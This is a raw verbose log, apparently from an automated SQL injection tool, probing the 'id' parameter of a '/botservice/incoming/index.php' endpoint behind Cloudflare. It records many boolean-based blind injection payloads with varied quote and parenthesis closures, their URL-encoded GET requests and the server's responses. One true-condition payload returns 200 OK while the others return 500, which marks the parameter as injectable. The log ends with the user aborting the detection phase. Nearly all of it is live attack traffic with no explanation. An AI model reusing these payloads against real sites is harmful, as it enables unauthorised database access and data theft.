Cf-ray: 43e230c8bcf14e18-DME
Content-type: text/html; charset=UTF-8

[#12] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dd90b88df2097c0a5537aa7cd7de655e81532223535; expires=Mon, 22-Jul-19 01:38:55 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%20AND%207063%3D7063--%20JKpV
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:38:58 GMT
Cf-ray: 43e230c8bcf14e18-DME
Content-type: text/html; charset=UTF-8

[04:38:59] [PAYLOAD] 3890" AND 2180=7943-- LGhe
[04:38:59] [TRAFFIC OUT] HTTP request [#13]:
GET /botservice/incoming/index.php?id=3890%22%20AND%202180%3D7943--%20LGhe HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:39:02] [TRAFFIC IN] HTTP response [#13] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dee0968427a0a193ff6d179c9cb1e63e61532223538; expires=Mon, 22-Jul-19 01:38:58 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%22%20AND%202180%3D7943--%20LGhe
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:01 GMT
Cf-ray: 43e230d96cb0905f-DME
Content-type: text/html; charset=UTF-8

[04:39:02] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:39:02] [TRAFFIC IN] HTTP response [#13] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dee0968427a0a193ff6d179c9cb1e63e61532223538; expires=Mon, 22-Jul-19 01:38:58 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%22%20AND%202180%3D7943--%20LGhe
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:01 GMT
Cf-ray: 43e230d96cb0905f-DME
Content-type: text/html; charset=UTF-8

[#13] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dee0968427a0a193ff6d179c9cb1e63e61532223538; expires=Mon, 22-Jul-19 01:38:58 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%22%20AND%202180%3D7943--%20LGhe
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:01 GMT
Cf-ray: 43e230d96cb0905f-DME
Content-type: text/html; charset=UTF-8

[04:39:02] [PAYLOAD] 3890" AND 7063=7063-- PJVM
[04:39:02] [TRAFFIC OUT] HTTP request [#14]:
GET /botservice/incoming/index.php?id=3890%22%20AND%207063%3D7063--%20PJVM HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:39:07] [TRAFFIC IN] HTTP response [#14] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d5f0abe8ddd384f3f7bff7a83dee5afd01532223541; expires=Mon, 22-Jul-19 01:39:01 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%22%20AND%207063%3D7063--%20PJVM
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:06 GMT
Cf-ray: 43e230ecaf409071-DME
Content-type: text/html; charset=UTF-8

[04:39:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:39:07] [TRAFFIC IN] HTTP response [#14] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d5f0abe8ddd384f3f7bff7a83dee5afd01532223541; expires=Mon, 22-Jul-19 01:39:01 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%22%20AND%207063%3D7063--%20PJVM
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:06 GMT
Cf-ray: 43e230ecaf409071-DME
Content-type: text/html; charset=UTF-8

[#14] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d5f0abe8ddd384f3f7bff7a83dee5afd01532223541; expires=Mon, 22-Jul-19 01:39:01 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%22%20AND%207063%3D7063--%20PJVM
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:06 GMT
Cf-ray: 43e230ecaf409071-DME
Content-type: text/html; charset=UTF-8

[04:39:07] [PAYLOAD] 3890) AND 4291=5064 AND (2755=2755
[04:39:07] [TRAFFIC OUT] HTTP request [#15]:
GET /botservice/incoming/index.php?id=3890%29%20AND%204291%3D5064%20AND%20%282755%3D2755 HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:39:12] [TRAFFIC IN] HTTP response [#15] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=de09424362f8ddc8b9c3e81e8dd3557311532223546; expires=Mon, 22-Jul-19 01:39:06 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%20AND%204291%3D5064%20AND%20%282755%3D2755
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:10 GMT
Cf-ray: 43e2310e2e919053-DME
Content-type: text/html; charset=UTF-8

[04:39:12] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:39:12] [TRAFFIC IN] HTTP response [#15] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=de09424362f8ddc8b9c3e81e8dd3557311532223546; expires=Mon, 22-Jul-19 01:39:06 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%20AND%204291%3D5064%20AND%20%282755%3D2755
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:10 GMT
Cf-ray: 43e2310e2e919053-DME
Content-type: text/html; charset=UTF-8

[#15] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=de09424362f8ddc8b9c3e81e8dd3557311532223546; expires=Mon, 22-Jul-19 01:39:06 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%20AND%204291%3D5064%20AND%20%282755%3D2755
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:10 GMT
Cf-ray: 43e2310e2e919053-DME
Content-type: text/html; charset=UTF-8

[04:39:12] [PAYLOAD] 3890) AND 7063=7063 AND (4761=4761
[04:39:12] [TRAFFIC OUT] HTTP request [#16]:
GET /botservice/incoming/index.php?id=3890%29%20AND%207063%3D7063%20AND%20%284761%3D4761 HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:39:16] [TRAFFIC IN] HTTP response [#16] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dae919c1e7f6451b55cfbac5b8f14ccae1532223550; expires=Mon, 22-Jul-19 01:39:10 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%20AND%207063%3D7063%20AND%20%284761%3D4761
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:14 GMT
Cf-ray: 43e2312869984e66-DME
Content-type: text/html; charset=UTF-8

[04:39:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:39:16] [TRAFFIC IN] HTTP response [#16] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dae919c1e7f6451b55cfbac5b8f14ccae1532223550; expires=Mon, 22-Jul-19 01:39:10 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%20AND%207063%3D7063%20AND%20%284761%3D4761
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:14 GMT
Cf-ray: 43e2312869984e66-DME
Content-type: text/html; charset=UTF-8

[#16] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dae919c1e7f6451b55cfbac5b8f14ccae1532223550; expires=Mon, 22-Jul-19 01:39:10 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%20AND%207063%3D7063%20AND%20%284761%3D4761
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:14 GMT
Cf-ray: 43e2312869984e66-DME
Content-type: text/html; charset=UTF-8

[04:39:16] [PAYLOAD] 3890)) AND 5516=2606 AND ((9424=9424
[04:39:16] [TRAFFIC OUT] HTTP request [#17]:
GET /botservice/incoming/index.php?id=3890%29%29%20AND%205516%3D2606%20AND%20%28%289424%3D9424 HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:39:17] [TRAFFIC IN] HTTP response [#17] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d1e7d9c13e1c9380784f2f0bb1e9db3241532223554; expires=Mon, 22-Jul-19 01:39:14 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%29%20AND%205516%3D2606%20AND%20%28%289424%3D9424
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:16 GMT
Cf-ray: 43e23141bef54eea-DME
Content-type: text/html; charset=UTF-8

[04:39:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:39:17] [TRAFFIC IN] HTTP response [#17] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d1e7d9c13e1c9380784f2f0bb1e9db3241532223554; expires=Mon, 22-Jul-19 01:39:14 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%29%20AND%205516%3D2606%20AND%20%28%289424%3D9424
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:16 GMT
Cf-ray: 43e23141bef54eea-DME
Content-type: text/html; charset=UTF-8

[#17] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d1e7d9c13e1c9380784f2f0bb1e9db3241532223554; expires=Mon, 22-Jul-19 01:39:14 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%29%20AND%205516%3D2606%20AND%20%28%289424%3D9424
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:16 GMT
Cf-ray: 43e23141bef54eea-DME
Content-type: text/html; charset=UTF-8

[04:39:17] [PAYLOAD] 3890)) AND 7063=7063 AND ((4955=4955
[04:39:17] [TRAFFIC OUT] HTTP request [#18]:
GET /botservice/incoming/index.php?id=3890%29%29%20AND%207063%3D7063%20AND%20%28%284955%3D4955 HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:39:23] [TRAFFIC IN] HTTP response [#18] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dc80da712e4eb24eaf95dd3e052f74e431532223556; expires=Mon, 22-Jul-19 01:39:16 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%29%20AND%207063%3D7063%20AND%20%28%284955%3D4955
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:21 GMT
Cf-ray: 43e2314c4b919065-DME
Content-type: text/html; charset=UTF-8

[04:39:23] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:39:23] [TRAFFIC IN] HTTP response [#18] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dc80da712e4eb24eaf95dd3e052f74e431532223556; expires=Mon, 22-Jul-19 01:39:16 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%29%20AND%207063%3D7063%20AND%20%28%284955%3D4955
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:21 GMT
Cf-ray: 43e2314c4b919065-DME
Content-type: text/html; charset=UTF-8

[#18] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dc80da712e4eb24eaf95dd3e052f74e431532223556; expires=Mon, 22-Jul-19 01:39:16 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%29%20AND%207063%3D7063%20AND%20%28%284955%3D4955
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:21 GMT
Cf-ray: 43e2314c4b919065-DME
Content-type: text/html; charset=UTF-8

[04:39:23] [PAYLOAD] 3890))) AND 8120=2977 AND (((4302=4302
[04:39:23] [TRAFFIC OUT] HTTP request [#19]:
GET /botservice/incoming/index.php?id=3890%29%29%29%20AND%208120%3D2977%20AND%20%28%28%284302%3D4302 HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:39:25] [TRAFFIC IN] HTTP response [#19] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d7109723a8236bd46125cb06594013c1a1532223561; expires=Mon, 22-Jul-19 01:39:21 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%29%29%20AND%208120%3D2977%20AND%20%28%28%284302%3D4302
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:24 GMT
Cf-ray: 43e2316c98e84e72-DME
Content-type: text/html; charset=UTF-8

[04:39:25] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:39:25] [TRAFFIC IN] HTTP response [#19] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d7109723a8236bd46125cb06594013c1a1532223561; expires=Mon, 22-Jul-19 01:39:21 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%29%29%20AND%208120%3D2977%20AND%20%28%28%284302%3D4302
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:24 GMT
Cf-ray: 43e2316c98e84e72-DME
Content-type: text/html; charset=UTF-8

[#19] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=d7109723a8236bd46125cb06594013c1a1532223561; expires=Mon, 22-Jul-19 01:39:21 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%29%29%20AND%208120%3D2977%20AND%20%28%28%284302%3D4302
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:24 GMT
Cf-ray: 43e2316c98e84e72-DME
Content-type: text/html; charset=UTF-8

[04:39:25] [PAYLOAD] 3890))) AND 7063=7063 AND (((7363=7363
[04:39:25] [TRAFFIC OUT] HTTP request [#20]:
GET /botservice/incoming/index.php?id=3890%29%29%29%20AND%207063%3D7063%20AND%20%28%28%287363%3D7363 HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:39:29] [TRAFFIC IN] HTTP response [#20] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=de75974d163dbbde483356025c7609a571532223564; expires=Mon, 22-Jul-19 01:39:24 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%29%29%20AND%207063%3D7063%20AND%20%28%28%287363%3D7363
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:27 GMT
Cf-ray: 43e2317d2e1d4ee4-DME
Content-type: text/html; charset=UTF-8

[04:39:29] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:39:29] [TRAFFIC IN] HTTP response [#20] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=de75974d163dbbde483356025c7609a571532223564; expires=Mon, 22-Jul-19 01:39:24 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%29%29%20AND%207063%3D7063%20AND%20%28%28%287363%3D7363
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:27 GMT
Cf-ray: 43e2317d2e1d4ee4-DME
Content-type: text/html; charset=UTF-8

[#20] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=de75974d163dbbde483356025c7609a571532223564; expires=Mon, 22-Jul-19 01:39:24 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%29%29%29%20AND%207063%3D7063%20AND%20%28%28%287363%3D7363
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:27 GMT
Cf-ray: 43e2317d2e1d4ee4-DME
Content-type: text/html; charset=UTF-8

[04:39:29] [PAYLOAD] 3890 AND 5541=8024
[04:39:29] [TRAFFIC OUT] HTTP request [#21]:
GET /botservice/incoming/index.php?id=3890%20AND%205541%3D8024 HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:39:33] [TRAFFIC IN] HTTP response [#21] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dd23bd0cd8bce731db951396900c573821532223567; expires=Mon, 22-Jul-19 01:39:27 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%20AND%205541%3D8024
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:32 GMT
Cf-ray: 43e23193aa6e9053-DME
Content-type: text/html; charset=UTF-8

[04:39:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:39:33] [TRAFFIC IN] HTTP response [#21] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dd23bd0cd8bce731db951396900c573821532223567; expires=Mon, 22-Jul-19 01:39:27 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%20AND%205541%3D8024
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:32 GMT
Cf-ray: 43e23193aa6e9053-DME
Content-type: text/html; charset=UTF-8

[#21] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dd23bd0cd8bce731db951396900c573821532223567; expires=Mon, 22-Jul-19 01:39:27 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%20AND%205541%3D8024
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:32 GMT
Cf-ray: 43e23193aa6e9053-DME
Content-type: text/html; charset=UTF-8

[04:39:33] [PAYLOAD] 3890 AND 7063=7063
[04:39:33] [TRAFFIC OUT] HTTP request [#22]:
GET /botservice/incoming/index.php?id=3890%20AND%207063%3D7063 HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:39:36] [TRAFFIC IN] HTTP response [#22] (200 OK):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Content-encoding: gzip
Transfer-encoding: chunked
Set-cookie: __cfduid=d8c0040aca4169c5a859401dd26f202621532223572; expires=Mon, 22-Jul-19 01:39:32 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%20AND%207063%3D7063
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:34 GMT
Cf-ray: 43e231adbe384ee4-DME
Content-type: text/html; charset=UTF-8

[04:39:36] [PAYLOAD] 3890') AND 5270=8049 AND ('STuN'='STuN
[04:39:36] [TRAFFIC OUT] HTTP request [#23]:
GET /botservice/incoming/index.php?id=3890%27%29%20AND%205270%3D8049%20AND%20%28%27STuN%27%3D%27STuN HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:39:39] [TRAFFIC IN] HTTP response [#23] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dd9e0fede7f0763fb5d85ba1605d79cac1532223574; expires=Mon, 22-Jul-19 01:39:34 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%29%20AND%205270%3D8049%20AND%20%28%27STuN%27%3D%27STuN
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:37 GMT
Cf-ray: 43e231be3e334e18-DME
Content-type: text/html; charset=UTF-8

[04:39:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[04:39:39] [TRAFFIC IN] HTTP response [#23] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dd9e0fede7f0763fb5d85ba1605d79cac1532223574; expires=Mon, 22-Jul-19 01:39:34 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%29%20AND%205270%3D8049%20AND%20%28%27STuN%27%3D%27STuN
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:37 GMT
Cf-ray: 43e231be3e334e18-DME
Content-type: text/html; charset=UTF-8

[#23] (500 Internal Server Error):
Expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-content-type-options: nosniff
Transfer-encoding: chunked
Set-cookie: __cfduid=dd9e0fede7f0763fb5d85ba1605d79cac1532223574; expires=Mon, 22-Jul-19 01:39:34 GMT; path=/; domain=.localhost; HttpOnly
Strict-transport-security: max-age=0
Uri: https://localhost:443/botservice/incoming/index.php?id=3890%27%29%20AND%205270%3D8049%20AND%20%28%27STuN%27%3D%27STuN
Server: cloudflare
Connection: close
Date: Sun, 22 Jul 2018 01:39:37 GMT
Cf-ray: 43e231be3e334e18-DME
Content-type: text/html; charset=UTF-8

[04:39:39] [PAYLOAD] 3890') AND 7063=7063 AND ('pDoM'='pDoM
[04:39:39] [TRAFFIC OUT] HTTP request [#24]:
GET /botservice/incoming/index.php?id=3890%27%29%20AND%207063%3D7063%20AND%20%28%27pDoM%27%3D%27pDoM HTTP/1.1
Host: localhost
Referer: https://localhost:443/botservice/incoming/index.php?id=3890
Accept-encoding: gzip,deflate
Accept: /
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)
Connection: close

[04:39:43] [WARNING] user aborted during detection phase
